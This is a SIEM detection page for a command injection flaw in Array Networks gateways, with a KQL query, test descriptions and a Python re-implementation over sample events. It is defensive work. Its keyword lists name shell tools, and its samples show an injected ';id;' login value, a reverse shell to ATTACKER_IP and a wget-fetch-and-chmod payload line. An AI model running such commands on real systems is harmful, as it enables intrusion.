CVE-2025-66644

Array Networks ArrayOS AG OS Command Injection (CVE-2025-66644)

Detects exploitation of CVE-2025-66644, an OS command injection vulnerability in Array Networks ArrayOS AG. This vulnerability allows remote attackers to execute arbitrary operating system commands through the Array Networks SSL VPN/ZTNA gateway. The flaw is tracked by CISA as a Known Exploited Vulnerability (KEV), indicating active in-the-wild exploitation. Attackers may leverage this to gain initial access, establish persistence, or pivot laterally within the network.

Vulnerability Intelligence

KEV: Known Exploited
CVSS: Unscored

What is CVE-2025-66644 (Array Networks ArrayOS AG OS Command Injection)?

CVE-2025-66644, an OS command injection in Array Networks ArrayOS AG, maps to the Initial Access, Execution and Lateral Movement tactics in MITRE ATT&CK: the adversary is trying to get into your network through the gateway, run commands on it, and move onward from it.

This page provides production-ready detection logic for Array Networks ArrayOS AG OS Command Injection (CVE-2025-66644), covering the data sources and telemetry it touches: CommonSecurityLog, Syslog, DeviceNetworkEvents. The queries below are rated critical severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.

MITRE ATT&CK

Tactic: Initial Access, Execution, Lateral Movement
Microsoft Sentinel / Defender (KQL)
// Optional scoping list of known Array Networks gateway IPs; leave empty to match every device.
let ArrayNetworksIPs = dynamic([]);
// Word-like tokens: has_any matches whole indexed terms, so these are reliable.
let SuspiciousTerms = dynamic(['wget', 'curl', 'chmod', 'bash', 'sh', 'nc', 'ncat', 'python', 'perl', 'ruby', 'base64', 'whoami', 'uname']);
// Shell metacharacters and staging paths are not alphanumeric terms, so has_any cannot match them; use a regex instead.
let SuspiciousPattern = @'(&&|\|\||`|\$\(|;\s*id\b|\bid\s*;|/tmp/|/dev/shm)';
union isfuzzy=true
(
  CommonSecurityLog
  | where DeviceVendor has_any ('Array Networks', 'ArrayNetworks')
  | where array_length(ArrayNetworksIPs) == 0 or DestinationIP in (ArrayNetworksIPs)
  | where Activity has_any ('command', 'exec', 'injection', 'shell', 'os')
     or Message has_any (SuspiciousTerms)
     or Message matches regex SuspiciousPattern
  | project TimeGenerated, DeviceVendor, DeviceProduct, SourceIP, DestinationIP, Activity, Message, AdditionalExtensions
  | extend AlertReason = 'Array Networks device activity with suspicious command patterns'
),
(
  Syslog
  | where Computer has_any ('arrayos', 'array-ag', 'arrayvpn')
     or ProcessName has_any ('ag', 'arrayd', 'arrayos')
  | where SyslogMessage has_any (SuspiciousTerms)
     or SyslogMessage matches regex SuspiciousPattern
  | project TimeGenerated, Computer, ProcessName, SyslogMessage, HostIP
  | extend AlertReason = 'ArrayOS syslog with OS command injection indicators'
),
(
  DeviceNetworkEvents
  | where InitiatingProcessFileName has_any ('wget', 'curl', 'nc', 'bash', 'sh', 'python')
  | where InitiatingProcessParentFileName has_any ('ag', 'arrayd', 'httpd', 'nginx')
  | project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
  | extend AlertReason = 'Suspicious child process spawned from Array Networks gateway process'
)
| order by TimeGenerated desc

Detects CVE-2025-66644 exploitation via CommonSecurityLog entries from Array Networks devices containing suspicious OS command patterns, Syslog events from ArrayOS hosts with injection indicators, and endpoint telemetry showing suspicious child processes spawned from gateway processes.

Severity: critical. Confidence: medium.

Data Sources

CommonSecurityLog, Syslog, DeviceNetworkEvents

Required Tables

CommonSecurityLog, Syslog, DeviceNetworkEvents

False Positives

  • Legitimate administrative scripts run on the Array Networks appliance by authorized personnel
  • Automated monitoring or health-check tools that spawn shell commands via the gateway management interface
  • Security scanning tools performing authorized vulnerability assessments against the appliance
  • Patch or update processes that invoke shell utilities during maintenance windows

Sigma rule & cross-platform mapping

The detection logic for Array Networks ArrayOS AG OS Command Injection (CVE-2025-66644) above is provided in a vendor-neutral form so you can deploy it on any SIEM. The same logic is shipped here as native KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic Security (EQL), IBM QRadar (AQL), Sumo Logic CSE, YARA-L (Google Chronicle / SecOps) and CrowdStrike LogScale (CQL) queries. In Sigma terms, this detection targets the following logsource:

logsource:
  category: network_connection
  product: windows

Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Simulate Array Networks OS Command Injection via HTTP Request

     Expected signal: Web access log entry on the target appliance showing a POST request to /cgi-bin/login with URL-encoded shell metacharacters (';id;') in the username parameter

  2. Test 2: Spawn Reverse Shell from Simulated Compromised Array Gateway Process

     Expected signal: Endpoint process telemetry showing a bash process whose parent matches the gateway daemon, and network telemetry showing an outbound TCP connection to ATTACKER_IP:4444 from the gateway host

  3. Test 3: Download and Execute Payload via Injected wget Command

     Expected signal: Process telemetry showing wget execution with an external URL argument spawned from a gateway-related parent process; DNS query for the ATTACKER_IP hostname; outbound HTTP connection to ATTACKER_IP:8080
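The following is an added example, not code from this page or from Array Networks: it re-implements the three branches of the KQL detection above (CommonSecurityLog, Syslog and endpoint process telemetry) in plain Python and runs them over constructed sample events that mirror the expected signals of the three tests, plus three benign events drawn from the False Positives list. Field names follow the Sentinel tables, but every record, hostname and IP address below is hand-built for the demonstration (IPs come from documentation ranges). Note that the URL-encoded ';id;' from Test 1 is only caught because the message is decoded before matching; term matching alone, as `has_any` does, cannot see shell metacharacters.

```python
# Added example (not the page's or vendor's own code): the three detection branches of
# the KQL above re-implemented in Python and run over constructed sample events that
# mirror the expected signals of the three tests. Record field names follow the
# Sentinel tables; every event below is hand-built, not captured telemetry.
import re
from urllib.parse import unquote

# Word-like tokens, matched as whole terms (the way KQL has_any matches).
SUSPICIOUS_TERMS = {"wget", "curl", "chmod", "bash", "sh", "nc", "ncat", "python",
                    "perl", "ruby", "base64", "whoami", "uname"}
# Shell metacharacters and staging paths are not alphanumeric terms, so a term match
# cannot find them; a regex covers them (';id;' from Test 1 is included here).
METACHAR_RE = re.compile(r"(&&|\|\||`|\$\(|;\s*id\b|\bid\s*;|/tmp/|/dev/shm)")
ACTIVITY_TERMS = {"command", "exec", "injection", "shell", "os"}
ARRAY_VENDORS = {"array networks", "arraynetworks"}
ARRAY_HOST_HINTS = ("arrayos", "array-ag", "arrayvpn")
ARRAY_PROCS = {"ag", "arrayd", "arrayos"}
GATEWAY_PARENTS = {"ag", "arrayd", "httpd", "nginx"}
SHELL_TOOLS = {"wget", "curl", "nc", "bash", "sh", "python"}


def _terms(text):
    """Split text into lowercase alphanumeric terms."""
    return set(re.findall(r"[a-z0-9_]+", text.lower()))


def has_command_indicators(text):
    """True when text carries a suspicious term or metacharacter sequence.
    URL-decodes first so an encoded '%3Bid%3B' in a web log is seen as ';id;'."""
    decoded = unquote(text)
    return bool(_terms(decoded) & SUSPICIOUS_TERMS) or METACHAR_RE.search(decoded) is not None


def check_cef_event(ev):
    """CommonSecurityLog branch: Array Networks vendor plus command-like activity or payload."""
    if ev.get("DeviceVendor", "").lower() not in ARRAY_VENDORS:
        return None
    if _terms(ev.get("Activity", "")) & ACTIVITY_TERMS or has_command_indicators(ev.get("Message", "")):
        return "Array Networks device activity with suspicious command patterns"
    return None


def check_syslog_event(ev):
    """Syslog branch: ArrayOS host or daemon plus injection indicators in the message."""
    host, proc = ev.get("Computer", "").lower(), ev.get("ProcessName", "").lower()
    if not (any(h in host for h in ARRAY_HOST_HINTS) or proc in ARRAY_PROCS):
        return None
    if has_command_indicators(ev.get("SyslogMessage", "")):
        return "ArrayOS syslog with OS command injection indicators"
    return None


def check_process_event(ev):
    """Endpoint branch: shell tooling whose parent is a gateway daemon or web server."""
    child = ev.get("InitiatingProcessFileName", "").lower()
    parent = ev.get("InitiatingProcessParentFileName", "").lower()
    if child in SHELL_TOOLS and parent in GATEWAY_PARENTS:
        return "Suspicious child process spawned from Array Networks gateway process"
    return None


CHECKS = {"CommonSecurityLog": check_cef_event,
          "Syslog": check_syslog_event,
          "DeviceNetworkEvents": check_process_event}


def run_detection(events):
    """Evaluate (table, record) pairs and return alerts newest first, like the KQL union."""
    alerts = []
    for table, ev in events:
        reason = CHECKS[table](ev)
        if reason:
            alerts.append({"TimeGenerated": ev["TimeGenerated"], "Table": table,
                           "AlertReason": reason})
    return sorted(alerts, key=lambda a: a["TimeGenerated"], reverse=True)


# Constructed sample events: three that mirror the expected signals of Tests 1-3 and
# three benign ones drawn from the False Positives list. IPs are from documentation ranges.
SAMPLE_EVENTS = [
    ("CommonSecurityLog", {"TimeGenerated": "2025-12-01T10:00:00Z", "DeviceVendor": "Array Networks",
                           "Activity": "Login", "Message": "POST /cgi-bin/login username=admin%3Bid%3B"}),
    ("Syslog", {"TimeGenerated": "2025-12-01T10:00:05Z", "Computer": "array-ag-01", "ProcessName": "ag",
                "SyslogMessage": "exec /bin/sh -c 'wget http://198.51.100.7:8080/p -O /tmp/p && chmod +x /tmp/p'"}),
    ("DeviceNetworkEvents", {"TimeGenerated": "2025-12-01T10:00:07Z", "InitiatingProcessFileName": "bash",
                             "InitiatingProcessParentFileName": "ag", "RemoteIP": "198.51.100.7", "RemotePort": 4444}),
    ("CommonSecurityLog", {"TimeGenerated": "2025-12-01T09:55:00Z", "DeviceVendor": "Array Networks",
                           "Activity": "Login", "Message": "POST /cgi-bin/login username=jdoe"}),
    ("Syslog", {"TimeGenerated": "2025-12-01T09:56:00Z", "Computer": "array-ag-01", "ProcessName": "ag",
                "SyslogMessage": "health check completed, status ok"}),
    ("DeviceNetworkEvents", {"TimeGenerated": "2025-12-01T09:57:00Z", "InitiatingProcessFileName": "bash",
                             "InitiatingProcessParentFileName": "cron", "RemoteIP": "203.0.113.9", "RemotePort": 443}),
]

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(alert["TimeGenerated"], alert["Table"], alert["AlertReason"])
```

Running the script yields three alerts (the Test 3 style process event, the Test 3 style syslog line, and the Test 1 style login request, newest first) and none for the benign login, health check and cron-spawned shell. Tuning for the False Positives listed above would be done by adding allowlists of approved parent processes or maintenance-window hosts in front of `run_detection`, not by loosening the indicator sets.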
